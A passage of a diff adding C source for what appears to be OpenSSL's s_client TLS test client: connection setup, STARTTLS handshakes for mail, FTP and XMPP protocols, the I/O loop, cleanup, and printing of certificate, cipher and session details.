+            BIO_printf(bio_err, "Can't open session file %s\n", sess_in);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        SSL_set_session(con, sess);
+        SSL_SESSION_free(sess);
+    }
+
+    if (fallback_scsv)
+        SSL_set_mode(con, SSL_MODE_SEND_FALLBACK_SCSV);
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (servername != NULL) {
+        if (!SSL_set_tlsext_host_name(con, servername)) {
+            BIO_printf(bio_err, "Unable to set TLS servername extension.\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+#endif
+#ifndef OPENSSL_NO_KRB5
+    if (con && (kctx = kssl_ctx_new()) != NULL) {
+        SSL_set0_kssl_ctx(con, kctx);
+        kssl_ctx_setstring(kctx, KSSL_SERVER, host);
+    }
+#endif                          /* OPENSSL_NO_KRB5 */
+/*      SSL_set_cipher_list(con,"RC4-MD5"); */
+#if 0
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    SSL_set_tlsext_opaque_prf_input(con, "Test client", 11);
+# endif
+#endif
+
+ re_start:
+
+    if (init_client(&s, host, port, socket_type) == 0) {
+        BIO_printf(bio_err, "connect:errno=%d\n", get_last_socket_error());
+        SHUTDOWN(s);
+        goto end;
+    }
+    BIO_printf(bio_c_out, "CONNECTED(%08X)\n", s);
+
+#ifdef FIONBIO
+    if (c_nbio) {
+        unsigned long l = 1;
+        BIO_printf(bio_c_out, "turning on non blocking io\n");
+        if (BIO_socket_ioctl(s, FIONBIO, &l) < 0) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+#endif
+    if (c_Pause & 0x01)
+        SSL_set_debug(con, 1);
+
+    if (socket_type == SOCK_DGRAM) {
+
+        sbio = BIO_new_dgram(s, BIO_NOCLOSE);
+        if (getsockname(s, &peer, (void *)&peerlen) < 0) {
+            BIO_printf(bio_err, "getsockname:errno=%d\n",
+                       get_last_socket_error());
+            SHUTDOWN(s);
+            goto end;
+        }
+
+        (void)BIO_ctrl_set_connected(sbio, 1, &peer);
+
+        if (enable_timeouts) {
+            timeout.tv_sec = 0;
+            timeout.tv_usec = DGRAM_RCV_TIMEOUT;
+            BIO_ctrl(sbio, BIO_CTRL_DGRAM_SET_RECV_TIMEOUT, 0, &timeout);
+
+            timeout.tv_sec = 0;
+            timeout.tv_usec = DGRAM_SND_TIMEOUT;
+            BIO_ctrl(sbio, BIO_CTRL_DGRAM_SET_SEND_TIMEOUT, 0, &timeout);
+        }
+
+        if (socket_mtu) {
+            if (socket_mtu < DTLS_get_link_min_mtu(con)) {
+                BIO_printf(bio_err, "MTU too small. Must be at least %ld\n",
+                           DTLS_get_link_min_mtu(con));
+                BIO_free(sbio);
+                goto shut;
+            }
+            SSL_set_options(con, SSL_OP_NO_QUERY_MTU);
+            if (!DTLS_set_link_mtu(con, socket_mtu)) {
+                BIO_printf(bio_err, "Failed to set MTU\n");
+                BIO_free(sbio);
+                goto shut;
+            }
+        } else
+            /* want to do MTU discovery */
+            BIO_ctrl(sbio, BIO_CTRL_DGRAM_MTU_DISCOVER, 0, NULL);
+    } else
+        sbio = BIO_new_socket(s, BIO_NOCLOSE);
+
+    if (nbio_test) {
+        BIO *test;
+
+        test = BIO_new(BIO_f_nbio_test());
+        sbio = BIO_push(test, sbio);
+    }
+
+    if (c_debug) {
+        SSL_set_debug(con, 1);
+        BIO_set_callback(sbio, bio_dump_callback);
+        BIO_set_callback_arg(sbio, (char *)bio_c_out);
+    }
+    if (c_msg) {
+#ifndef OPENSSL_NO_SSL_TRACE
+        if (c_msg == 2)
+            SSL_set_msg_callback(con, SSL_trace);
+        else
+#endif
+            SSL_set_msg_callback(con, msg_cb);
+        SSL_set_msg_callback_arg(con, bio_c_msg ? bio_c_msg : bio_c_out);
+    }
+#ifndef OPENSSL_NO_TLSEXT
+    if (c_tlsextdebug) {
+        SSL_set_tlsext_debug_callback(con, tlsext_cb);
+        SSL_set_tlsext_debug_arg(con, bio_c_out);
+    }
+    if (c_status_req) {
+        SSL_set_tlsext_status_type(con, TLSEXT_STATUSTYPE_ocsp);
+        SSL_CTX_set_tlsext_status_cb(ctx, ocsp_resp_cb);
+        SSL_CTX_set_tlsext_status_arg(ctx, bio_c_out);
+# if 0
+        {
+            STACK_OF(OCSP_RESPID) *ids = sk_OCSP_RESPID_new_null();
+            OCSP_RESPID *id = OCSP_RESPID_new();
+            id->value.byKey = ASN1_OCTET_STRING_new();
+            id->type = V_OCSP_RESPID_KEY;
+            ASN1_STRING_set(id->value.byKey, "Hello World", -1);
+            sk_OCSP_RESPID_push(ids, id);
+            SSL_set_tlsext_status_ids(con, ids);
+        }
+# endif
+    }
+#endif
+#ifndef OPENSSL_NO_JPAKE
+    if (jpake_secret)
+        jpake_client_auth(bio_c_out, sbio, jpake_secret);
+#endif
+
+    SSL_set_bio(con, sbio, sbio);
+    SSL_set_connect_state(con);
+
+    /* ok, lets connect */
+    width = SSL_get_fd(con) + 1;
+
+    read_tty = 1;
+    write_tty = 0;
+    tty_on = 0;
+    read_ssl = 1;
+    write_ssl = 1;
+
+    cbuf_len = 0;
+    cbuf_off = 0;
+    sbuf_len = 0;
+    sbuf_off = 0;
+
+    /* This is an ugly hack that does a lot of assumptions */
+    /*
+     * We do have to handle multi-line responses which may come in a single
+     * packet or not. We therefore have to use BIO_gets() which does need a
+     * buffering BIO. So during the initial chitchat we do push a buffering
+     * BIO into the chain that is removed again later on to not disturb the
+     * rest of the s_client operation.
+     */
+    if (starttls_proto == PROTO_SMTP) {
+        int foundit = 0;
+        BIO *fbio = BIO_new(BIO_f_buffer());
+        BIO_push(fbio, sbio);
+        /* wait for multi-line response to end from SMTP */
+        do {
+            mbuf_len = BIO_gets(fbio, mbuf, BUFSIZZ);
+        }
+        while (mbuf_len > 3 && mbuf[3] == '-');
+        /* STARTTLS command requires EHLO... */
+        BIO_printf(fbio, "EHLO openssl.client.net\r\n");
+        (void)BIO_flush(fbio);
+        /* wait for multi-line response to end EHLO SMTP response */
+        do {
+            mbuf_len = BIO_gets(fbio, mbuf, BUFSIZZ);
+            if (strstr(mbuf, "STARTTLS"))
+                foundit = 1;
+        }
+        while (mbuf_len > 3 && mbuf[3] == '-');
+        (void)BIO_flush(fbio);
+        BIO_pop(fbio);
+        BIO_free(fbio);
+        if (!foundit)
+            BIO_printf(bio_err,
+                       "didn't found starttls in server response,"
+                       " try anyway...\n");
+        BIO_printf(sbio, "STARTTLS\r\n");
+        BIO_read(sbio, sbuf, BUFSIZZ);
+    } else if (starttls_proto == PROTO_POP3) {
+        BIO_read(sbio, mbuf, BUFSIZZ);
+        BIO_printf(sbio, "STLS\r\n");
+        BIO_read(sbio, sbuf, BUFSIZZ);
+    } else if (starttls_proto == PROTO_IMAP) {
+        int foundit = 0;
+        BIO *fbio = BIO_new(BIO_f_buffer());
+        BIO_push(fbio, sbio);
+        BIO_gets(fbio, mbuf, BUFSIZZ);
+        /* STARTTLS command requires CAPABILITY... */
+        BIO_printf(fbio, ". CAPABILITY\r\n");
+        (void)BIO_flush(fbio);
+        /* wait for multi-line CAPABILITY response */
+        do {
+            mbuf_len = BIO_gets(fbio, mbuf, BUFSIZZ);
+            if (strstr(mbuf, "STARTTLS"))
+                foundit = 1;
+        }
+        while (mbuf_len > 3 && mbuf[0] != '.');
+        (void)BIO_flush(fbio);
+        BIO_pop(fbio);
+        BIO_free(fbio);
+        if (!foundit)
+            BIO_printf(bio_err,
+                       "didn't found STARTTLS in server response,"
+                       " try anyway...\n");
+        BIO_printf(sbio, ". STARTTLS\r\n");
+        BIO_read(sbio, sbuf, BUFSIZZ);
+    } else if (starttls_proto == PROTO_FTP) {
+        BIO *fbio = BIO_new(BIO_f_buffer());
+        BIO_push(fbio, sbio);
+        /* wait for multi-line response to end from FTP */
+        do {
+            mbuf_len = BIO_gets(fbio, mbuf, BUFSIZZ);
+        }
+        while (mbuf_len > 3 && mbuf[3] == '-');
+        (void)BIO_flush(fbio);
+        BIO_pop(fbio);
+        BIO_free(fbio);
+        BIO_printf(sbio, "AUTH TLS\r\n");
+        BIO_read(sbio, sbuf, BUFSIZZ);
+    }
+    if (starttls_proto == PROTO_XMPP) {
+        int seen = 0;
+        BIO_printf(sbio, "<stream:stream "
+                   "xmlns:stream='http://etherx.jabber.org/streams' "
+                   "xmlns='jabber:client' to='%s' version='1.0'>", host);
+        seen = BIO_read(sbio, mbuf, BUFSIZZ);
+        mbuf[seen] = 0;
+        while (!strstr
+               (mbuf, "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'")) {
+            if (strstr(mbuf, "/stream:features>"))
+                goto shut;
+            seen = BIO_read(sbio, mbuf, BUFSIZZ);
+            mbuf[seen] = 0;
+        }
+        BIO_printf(sbio,
+                   "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>");
+        seen = BIO_read(sbio, sbuf, BUFSIZZ);
+        sbuf[seen] = 0;
+        if (!strstr(sbuf, "<proceed"))
+            goto shut;
+        mbuf[0] = 0;
+    }
+
+    for (;;) {
+        FD_ZERO(&readfds);
+        FD_ZERO(&writefds);
+
+        if ((SSL_version(con) == DTLS1_VERSION) &&
+            DTLSv1_get_timeout(con, &timeout))
+            timeoutp = &timeout;
+        else
+            timeoutp = NULL;
+
+        if (SSL_in_init(con) && !SSL_total_renegotiations(con)) {
+            in_init = 1;
+            tty_on = 0;
+        } else {
+            tty_on = 1;
+            if (in_init) {
+                in_init = 0;
+#if 0                           /* This test doesn't really work as intended
+                                 * (needs to be fixed) */
+# ifndef OPENSSL_NO_TLSEXT
+                if (servername != NULL && !SSL_session_reused(con)) {
+                    BIO_printf(bio_c_out,
+                               "Server did %sacknowledge servername extension.\n",
+                               tlsextcbp.ack ? "" : "not ");
+                }
+# endif
+#endif
+                if (sess_out) {
+                    BIO *stmp = BIO_new_file(sess_out, "w");
+                    if (stmp) {
+                        PEM_write_bio_SSL_SESSION(stmp, SSL_get_session(con));
+                        BIO_free(stmp);
+                    } else
+                        BIO_printf(bio_err, "Error writing session file %s\n",
+                                   sess_out);
+                }
+                if (c_brief) {
+                    BIO_puts(bio_err, "CONNECTION ESTABLISHED\n");
+                    print_ssl_summary(bio_err, con);
+                }
+
+                print_stuff(bio_c_out, con, full_log);
+                if (full_log > 0)
+                    full_log--;
+
+                if (starttls_proto) {
+                    BIO_printf(bio_err, "%s", mbuf);
+                    /* We don't need to know any more */
+                    starttls_proto = PROTO_OFF;
+                }
+
+                if (reconnect) {
+                    reconnect--;
+                    BIO_printf(bio_c_out,
+                               "drop connection and then reconnect\n");
+                    SSL_shutdown(con);
+                    SSL_set_connect_state(con);
+                    SHUTDOWN(SSL_get_fd(con));
+                    goto re_start;
+                }
+            }
+        }
+
+        ssl_pending = read_ssl && SSL_pending(con);
+
+        if (!ssl_pending) {
+#if !defined(OPENSSL_SYS_WINDOWS) && !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_NETWARE) && !defined (OPENSSL_SYS_BEOS_R5)
+            if (tty_on) {
+                if (read_tty)
+                    openssl_fdset(fileno(stdin), &readfds);
+                if (write_tty)
+                    openssl_fdset(fileno(stdout), &writefds);
+            }
+            if (read_ssl)
+                openssl_fdset(SSL_get_fd(con), &readfds);
+            if (write_ssl)
+                openssl_fdset(SSL_get_fd(con), &writefds);
+#else
+            if (!tty_on || !write_tty) {
+                if (read_ssl)
+                    openssl_fdset(SSL_get_fd(con), &readfds);
+                if (write_ssl)
+                    openssl_fdset(SSL_get_fd(con), &writefds);
+            }
+#endif
+/*-         printf("mode tty(%d %d%d) ssl(%d%d)\n",
+                    tty_on,read_tty,write_tty,read_ssl,write_ssl);*/
+
+            /*
+             * Note: under VMS with SOCKETSHR the second parameter is
+             * currently of type (int *) whereas under other systems it is
+             * (void *) if you don't have a cast it will choke the compiler:
+             * if you do have a cast then you can either go for (int *) or
+             * (void *).
+             */
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS)
+            /*
+             * Under Windows/DOS we make the assumption that we can always
+             * write to the tty: therefore if we need to write to the tty we
+             * just fall through. Otherwise we timeout the select every
+             * second and see if there are any keypresses. Note: this is a
+             * hack, in a proper Windows application we wouldn't do this.
+             */
+            i = 0;
+            if (!write_tty) {
+                if (read_tty) {
+                    tv.tv_sec = 1;
+                    tv.tv_usec = 0;
+                    i = select(width, (void *)&readfds, (void *)&writefds,
+                               NULL, &tv);
+# if defined(OPENSSL_SYS_WINCE) || defined(OPENSSL_SYS_MSDOS)
+                    if (!i && (!_kbhit() || !read_tty))
+                        continue;
+# else
+                    if (!i && (!((_kbhit())
+                                 || (WAIT_OBJECT_0 ==
+                                     WaitForSingleObject(GetStdHandle
+                                                         (STD_INPUT_HANDLE),
+                                                         0)))
+                               || !read_tty))
+                        continue;
+# endif
+                } else
+                    i = select(width, (void *)&readfds, (void *)&writefds,
+                               NULL, timeoutp);
+            }
+#elif defined(OPENSSL_SYS_NETWARE)
+            if (!write_tty) {
+                if (read_tty) {
+                    tv.tv_sec = 1;
+                    tv.tv_usec = 0;
+                    i = select(width, (void *)&readfds, (void *)&writefds,
+                               NULL, &tv);
+                } else
+                    i = select(width, (void *)&readfds, (void *)&writefds,
+                               NULL, timeoutp);
+            }
+#elif defined(OPENSSL_SYS_BEOS_R5)
+            /* Under BeOS-R5 the situation is similar to DOS */
+            i = 0;
+            stdin_set = 0;
+            (void)fcntl(fileno(stdin), F_SETFL, O_NONBLOCK);
+            if (!write_tty) {
+                if (read_tty) {
+                    tv.tv_sec = 1;
+                    tv.tv_usec = 0;
+                    i = select(width, (void *)&readfds, (void *)&writefds,
+                               NULL, &tv);
+                    if (read(fileno(stdin), sbuf, 0) >= 0)
+                        stdin_set = 1;
+                    if (!i && (stdin_set != 1 || !read_tty))
+                        continue;
+                } else
+                    i = select(width, (void *)&readfds, (void *)&writefds,
+                               NULL, timeoutp);
+            }
+            (void)fcntl(fileno(stdin), F_SETFL, 0);
+#else
+            i = select(width, (void *)&readfds, (void *)&writefds,
+                       NULL, timeoutp);
+#endif
+            if (i < 0) {
+                BIO_printf(bio_err, "bad select %d\n",
+                           get_last_socket_error());
+                goto shut;
+                /* goto end; */
+            }
+        }
+
+        if ((SSL_version(con) == DTLS1_VERSION)
+            && DTLSv1_handle_timeout(con) > 0) {
+            BIO_printf(bio_err, "TIMEOUT occured\n");
+        }
+
+        if (!ssl_pending && FD_ISSET(SSL_get_fd(con), &writefds)) {
+            k = SSL_write(con, &(cbuf[cbuf_off]), (unsigned int)cbuf_len);
+            switch (SSL_get_error(con, k)) {
+            case SSL_ERROR_NONE:
+                cbuf_off += k;
+                cbuf_len -= k;
+                if (k <= 0)
+                    goto end;
+                /* we have done a  write(con,NULL,0); */
+                if (cbuf_len <= 0) {
+                    read_tty = 1;
+                    write_ssl = 0;
+                } else {        /* if (cbuf_len > 0) */
+
+                    read_tty = 0;
+                    write_ssl = 1;
+                }
+                break;
+            case SSL_ERROR_WANT_WRITE:
+                BIO_printf(bio_c_out, "write W BLOCK\n");
+                write_ssl = 1;
+                read_tty = 0;
+                break;
+            case SSL_ERROR_WANT_READ:
+                BIO_printf(bio_c_out, "write R BLOCK\n");
+                write_tty = 0;
+                read_ssl = 1;
+                write_ssl = 0;
+                break;
+            case SSL_ERROR_WANT_X509_LOOKUP:
+                BIO_printf(bio_c_out, "write X BLOCK\n");
+                break;
+            case SSL_ERROR_ZERO_RETURN:
+                if (cbuf_len != 0) {
+                    BIO_printf(bio_c_out, "shutdown\n");
+                    ret = 0;
+                    goto shut;
+                } else {
+                    read_tty = 1;
+                    write_ssl = 0;
+                    break;
+                }
+
+            case SSL_ERROR_SYSCALL:
+                if ((k != 0) || (cbuf_len != 0)) {
+                    BIO_printf(bio_err, "write:errno=%d\n",
+                               get_last_socket_error());
+                    goto shut;
+                } else {
+                    read_tty = 1;
+                    write_ssl = 0;
+                }
+                break;
+            case SSL_ERROR_SSL:
+                ERR_print_errors(bio_err);
+                goto shut;
+            }
+        }
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_NETWARE) || defined(OPENSSL_SYS_BEOS_R5)
+        /* Assume Windows/DOS/BeOS can always write */
+        else if (!ssl_pending && write_tty)
+#else
+        else if (!ssl_pending && FD_ISSET(fileno(stdout), &writefds))
+#endif
+        {
+#ifdef CHARSET_EBCDIC
+            ascii2ebcdic(&(sbuf[sbuf_off]), &(sbuf[sbuf_off]), sbuf_len);
+#endif
+            i = raw_write_stdout(&(sbuf[sbuf_off]), sbuf_len);
+
+            if (i <= 0) {
+                BIO_printf(bio_c_out, "DONE\n");
+                ret = 0;
+                goto shut;
+                /* goto end; */
+            }
+
+            sbuf_len -= i;;
+            sbuf_off += i;
+            if (sbuf_len <= 0) {
+                read_ssl = 1;
+                write_tty = 0;
+            }
+        } else if (ssl_pending || FD_ISSET(SSL_get_fd(con), &readfds)) {
+#ifdef RENEG
+            {
+                static int iiii;
+                if (++iiii == 52) {
+                    SSL_renegotiate(con);
+                    iiii = 0;
+                }
+            }
+#endif
+#if 1
+            k = SSL_read(con, sbuf, 1024 /* BUFSIZZ */ );
+#else
+/* Demo for pending and peek :-) */
+            k = SSL_read(con, sbuf, 16);
+            {
+                char zbuf[10240];
+                printf("read=%d pending=%d peek=%d\n", k, SSL_pending(con),
+                       SSL_peek(con, zbuf, 10240));
+            }
+#endif
+
+            switch (SSL_get_error(con, k)) {
+            case SSL_ERROR_NONE:
+                if (k <= 0)
+                    goto end;
+                sbuf_off = 0;
+                sbuf_len = k;
+
+                read_ssl = 0;
+                write_tty = 1;
+                break;
+            case SSL_ERROR_WANT_WRITE:
+                BIO_printf(bio_c_out, "read W BLOCK\n");
+                write_ssl = 1;
+                read_tty = 0;
+                break;
+            case SSL_ERROR_WANT_READ:
+                BIO_printf(bio_c_out, "read R BLOCK\n");
+                write_tty = 0;
+                read_ssl = 1;
+                if ((read_tty == 0) && (write_ssl == 0))
+                    write_ssl = 1;
+                break;
+            case SSL_ERROR_WANT_X509_LOOKUP:
+                BIO_printf(bio_c_out, "read X BLOCK\n");
+                break;
+            case SSL_ERROR_SYSCALL:
+                ret = get_last_socket_error();
+                if (c_brief)
+                    BIO_puts(bio_err, "CONNECTION CLOSED BY SERVER\n");
+                else
+                    BIO_printf(bio_err, "read:errno=%d\n", ret);
+                goto shut;
+            case SSL_ERROR_ZERO_RETURN:
+                BIO_printf(bio_c_out, "closed\n");
+                ret = 0;
+                goto shut;
+            case SSL_ERROR_SSL:
+                ERR_print_errors(bio_err);
+                goto shut;
+                /* break; */
+            }
+        }
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS)
+# if defined(OPENSSL_SYS_WINCE) || defined(OPENSSL_SYS_MSDOS)
+        else if (_kbhit())
+# else
+        else if ((_kbhit())
+                 || (WAIT_OBJECT_0 ==
+                     WaitForSingleObject(GetStdHandle(STD_INPUT_HANDLE), 0)))
+# endif
+#elif defined (OPENSSL_SYS_NETWARE)
+        else if (_kbhit())
+#elif defined(OPENSSL_SYS_BEOS_R5)
+        else if (stdin_set)
+#else
+        else if (FD_ISSET(fileno(stdin), &readfds))
+#endif
+        {
+            if (crlf) {
+                int j, lf_num;
+
+                i = raw_read_stdin(cbuf, BUFSIZZ / 2);
+                lf_num = 0;
+                /* both loops are skipped when i <= 0 */
+                for (j = 0; j < i; j++)
+                    if (cbuf[j] == '\n')
+                        lf_num++;
+                for (j = i - 1; j >= 0; j--) {
+                    cbuf[j + lf_num] = cbuf[j];
+                    if (cbuf[j] == '\n') {
+                        lf_num--;
+                        i++;
+                        cbuf[j + lf_num] = '\r';
+                    }
+                }
+                assert(lf_num == 0);
+            } else
+                i = raw_read_stdin(cbuf, BUFSIZZ);
+
+            if ((!c_ign_eof) && ((i <= 0) || (cbuf[0] == 'Q'))) {
+                BIO_printf(bio_err, "DONE\n");
+                ret = 0;
+                goto shut;
+            }
+
+            if ((!c_ign_eof) && (cbuf[0] == 'R')) {
+                BIO_printf(bio_err, "RENEGOTIATING\n");
+                SSL_renegotiate(con);
+                cbuf_len = 0;
+            }
+#ifndef OPENSSL_NO_HEARTBEATS
+            else if ((!c_ign_eof) && (cbuf[0] == 'B')) {
+                BIO_printf(bio_err, "HEARTBEATING\n");
+                SSL_heartbeat(con);
+                cbuf_len = 0;
+            }
+#endif
+            else {
+                cbuf_len = i;
+                cbuf_off = 0;
+#ifdef CHARSET_EBCDIC
+                ebcdic2ascii(cbuf, cbuf, i);
+#endif
+            }
+
+            write_ssl = 1;
+            read_tty = 0;
+        }
+    }
+
+    ret = 0;
+ shut:
+    if (in_init)
+        print_stuff(bio_c_out, con, full_log);
+    SSL_shutdown(con);
+    SHUTDOWN(SSL_get_fd(con));
+ end:
+    if (con != NULL) {
+        if (prexit != 0)
+            print_stuff(bio_c_out, con, 1);
+        SSL_free(con);
+    }
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+    if (next_proto.data)
+        OPENSSL_free(next_proto.data);
+#endif
+    if (ctx != NULL)
+        SSL_CTX_free(ctx);
+    if (cert)
+        X509_free(cert);
+    if (crls)
+        sk_X509_CRL_pop_free(crls, X509_CRL_free);
+    if (key)
+        EVP_PKEY_free(key);
+    if (chain)
+        sk_X509_pop_free(chain, X509_free);
+    if (pass)
+        OPENSSL_free(pass);
+    if (vpm)
+        X509_VERIFY_PARAM_free(vpm);
+    ssl_excert_free(exc);
+    if (ssl_args)
+        sk_OPENSSL_STRING_free(ssl_args);
+    if (cctx)
+        SSL_CONF_CTX_free(cctx);
+#ifndef OPENSSL_NO_JPAKE
+    if (jpake_secret && psk_key)
+        OPENSSL_free(psk_key);
+#endif
+    if (cbuf != NULL) {
+        OPENSSL_cleanse(cbuf, BUFSIZZ);
+        OPENSSL_free(cbuf);
+    }
+    if (sbuf != NULL) {
+        OPENSSL_cleanse(sbuf, BUFSIZZ);
+        OPENSSL_free(sbuf);
+    }
+    if (mbuf != NULL) {
+        OPENSSL_cleanse(mbuf, BUFSIZZ);
+        OPENSSL_free(mbuf);
+    }
+    if (bio_c_out != NULL) {
+        BIO_free(bio_c_out);
+        bio_c_out = NULL;
+    }
+    if (bio_c_msg != NULL) {
+        BIO_free(bio_c_msg);
+        bio_c_msg = NULL;
+    }
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static void print_stuff(BIO *bio, SSL *s, int full)
+{
+    X509 *peer = NULL;
+    char *p;
+    static const char *space = "                ";
+    char buf[BUFSIZ];
+    STACK_OF(X509) *sk;
+    STACK_OF(X509_NAME) *sk2;
+    const SSL_CIPHER *c;
+    X509_NAME *xn;
+    int j, i;
+#ifndef OPENSSL_NO_COMP
+    const COMP_METHOD *comp, *expansion;
+#endif
+    unsigned char *exportedkeymat;
+
+    if (full) {
+        int got_a_chain = 0;
+
+        sk = SSL_get_peer_cert_chain(s);
+        if (sk != NULL) {
+            got_a_chain = 1;    /* we don't have it for SSL2 (yet) */
+
+            BIO_printf(bio, "---\nCertificate chain\n");
+            for (i = 0; i < sk_X509_num(sk); i++) {
+                X509_NAME_oneline(X509_get_subject_name(sk_X509_value(sk, i)),
+                                  buf, sizeof buf);
+                BIO_printf(bio, "%2d s:%s\n", i, buf);
+                X509_NAME_oneline(X509_get_issuer_name(sk_X509_value(sk, i)),
+                                  buf, sizeof buf);
+                BIO_printf(bio, "   i:%s\n", buf);
+                if (c_showcerts)
+                    PEM_write_bio_X509(bio, sk_X509_value(sk, i));
+            }
+        }
+
+        BIO_printf(bio, "---\n");
+        peer = SSL_get_peer_certificate(s);
+        if (peer != NULL) {
+            BIO_printf(bio, "Server certificate\n");
+
+            /* Redundant if we showed the whole chain */
+            if (!(c_showcerts && got_a_chain))
+                PEM_write_bio_X509(bio, peer);
+            X509_NAME_oneline(X509_get_subject_name(peer), buf, sizeof buf);
+            BIO_printf(bio, "subject=%s\n", buf);
+            X509_NAME_oneline(X509_get_issuer_name(peer), buf, sizeof buf);
+            BIO_printf(bio, "issuer=%s\n", buf);
+        } else
+            BIO_printf(bio, "no peer certificate available\n");
+
+        sk2 = SSL_get_client_CA_list(s);
+        if ((sk2 != NULL) && (sk_X509_NAME_num(sk2) > 0)) {
+            BIO_printf(bio, "---\nAcceptable client certificate CA names\n");
+            for (i = 0; i < sk_X509_NAME_num(sk2); i++) {
+                xn = sk_X509_NAME_value(sk2, i);
+                X509_NAME_oneline(xn, buf, sizeof(buf));
+                BIO_write(bio, buf, strlen(buf));
+                BIO_write(bio, "\n", 1);
+            }
+        } else {
+            BIO_printf(bio, "---\nNo client certificate CA names sent\n");
+        }
+        p = SSL_get_shared_ciphers(s, buf, sizeof buf);
+        if (p != NULL) {
+            /*
+             * This works only for SSL 2.  In later protocol versions, the
+             * client does not know what other ciphers (in addition to the
+             * one to be used in the current connection) the server supports.
+             */
+
+            BIO_printf(bio,
+                       "---\nCiphers common between both SSL endpoints:\n");
+            j = i = 0;
+            while (*p) {
+                if (*p == ':') {
+                    BIO_write(bio, space, 15 - j % 25);
+                    i++;
+                    j = 0;
+                    BIO_write(bio, ((i % 3) ? " " : "\n"), 1);
+                } else {
+                    BIO_write(bio, p, 1);
+                    j++;
+                }
+                p++;
+            }
+            BIO_write(bio, "\n", 1);
+        }
+
+        ssl_print_sigalgs(bio, s);
+        ssl_print_tmp_key(bio, s);
+
+        BIO_printf(bio,
+                   "---\nSSL handshake has read %ld bytes and written %ld bytes\n",
+                   BIO_number_read(SSL_get_rbio(s)),
+                   BIO_number_written(SSL_get_wbio(s)));
+    }
+    BIO_printf(bio, (SSL_cache_hit(s) ? "---\nReused, " : "---\nNew, "));
+    c = SSL_get_current_cipher(s);
+    BIO_printf(bio, "%s, Cipher is %s\n",
+               SSL_CIPHER_get_version(c), SSL_CIPHER_get_name(c));
+    if (peer != NULL) {
+        EVP_PKEY *pktmp;
+        pktmp = X509_get_pubkey(peer);
+        BIO_printf(bio, "Server public key is %d bit\n",
+                   EVP_PKEY_bits(pktmp));
+        EVP_PKEY_free(pktmp);
+    }
+    BIO_printf(bio, "Secure Renegotiation IS%s supported\n",
+               SSL_get_secure_renegotiation_support(s) ? "" : " NOT");
+#ifndef OPENSSL_NO_COMP
+    comp = SSL_get_current_compression(s);
+    expansion = SSL_get_current_expansion(s);
+    BIO_printf(bio, "Compression: %s\n",
+               comp ? SSL_COMP_get_name(comp) : "NONE");
+    BIO_printf(bio, "Expansion: %s\n",
+               expansion ? SSL_COMP_get_name(expansion) : "NONE");
+#endif
+
+#ifdef SSL_DEBUG
+    {
+        /* Print out local port of connection: useful for debugging */
+        int sock;
+        struct sockaddr_in ladd;
+        socklen_t ladd_size = sizeof(ladd);
+        sock = SSL_get_fd(s);
+        getsockname(sock, (struct sockaddr *)&ladd, &ladd_size);
+        BIO_printf(bio_c_out, "LOCAL PORT is %u\n", ntohs(ladd.sin_port));
+    }
+#endif
+
+#if !defined(OPENSSL_NO_TLSEXT)
+# if !defined(OPENSSL_NO_NEXTPROTONEG)
+    if (next_proto.status != -1) {
+        const unsigned char *proto;
+        unsigned int proto_len;
+        SSL_get0_next_proto_negotiated(s, &proto, &proto_len);
+        BIO_printf(bio, "Next protocol: (%d) ", next_proto.status);
+        BIO_write(bio, proto, proto_len);
+        BIO_write(bio, "\n", 1);
+    }
+# endif
+    {
+        const unsigned char *proto;
+        unsigned int proto_len;
+        SSL_get0_alpn_selected(s, &proto, &proto_len);
+        if (proto_len > 0) {
+            BIO_printf(bio, "ALPN protocol: ");
+            BIO_write(bio, proto, proto_len);
+            BIO_write(bio, "\n", 1);
+        } else
+            BIO_printf(bio, "No ALPN negotiated\n");
+    }
+#endif
+
+#ifndef OPENSSL_NO_SRTP
+    {
+        SRTP_PROTECTION_PROFILE *srtp_profile =
+            SSL_get_selected_srtp_profile(s);
+
+        if (srtp_profile)
+            BIO_printf(bio, "SRTP Extension negotiated, profile=%s\n",
+                       srtp_profile->name);
+    }
+#endif
+
+    SSL_SESSION_print(bio, SSL_get_session(s));
+    if (keymatexportlabel != NULL) {
+        BIO_printf(bio, "Keying material exporter:\n");
+        BIO_printf(bio, "    Label: '%s'\n", keymatexportlabel);
+        BIO_printf(bio, "    Length: %i bytes\n", keymatexportlen);
+        exportedkeymat = OPENSSL_malloc(keymatexportlen);
+        if (exportedkeymat != NULL) {
+            if (!SSL_export_keying_material(s, exportedkeymat,
+                                            keymatexportlen,
+                                            keymatexportlabel,
+                                            strlen(keymatexportlabel),
+                                            NULL, 0, 0)) {
+                BIO_printf(bio, "    Error\n");
+            } else {
+                BIO_printf(bio, "    Keying material: ");
+                for (i = 0; i < keymatexportlen; i++)
+                    BIO_printf(bio, "%02X", exportedkeymat[i]);
+                BIO_printf(bio, "\n");
+            }
+            OPENSSL_free(exportedkeymat);
+        }
+    }
+    BIO_printf(bio, "---\n");
+    if (peer != NULL)
+        X509_free(peer);
+    /* flush, or debugging output gets mixed with http response */
+    (void)BIO_flush(bio);
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+
+static int ocsp_resp_cb(SSL *s, void *arg)
+{
+    const unsigned char *p;
+    int len;
+    OCSP_RESPONSE *rsp;
+    len = SSL_get_tlsext_status_ocsp_resp(s, &p);
+    BIO_puts(arg, "OCSP response: ");
+    if (!p) {
+        BIO_puts(arg, "no response sent\n");
+        return 1;
+    }
+    rsp = d2i_OCSP_RESPONSE(NULL, &p, len);
+    if (!rsp) {
+        BIO_puts(arg, "response parse error\n");
+        BIO_dump_indent(arg, (char *)p, len, 4);
+        return 0;
+    }
+    BIO_puts(arg, "\n======================================\n");
+    OCSP_RESPONSE_print(arg, rsp, 0);
+    BIO_puts(arg, "======================================\n");
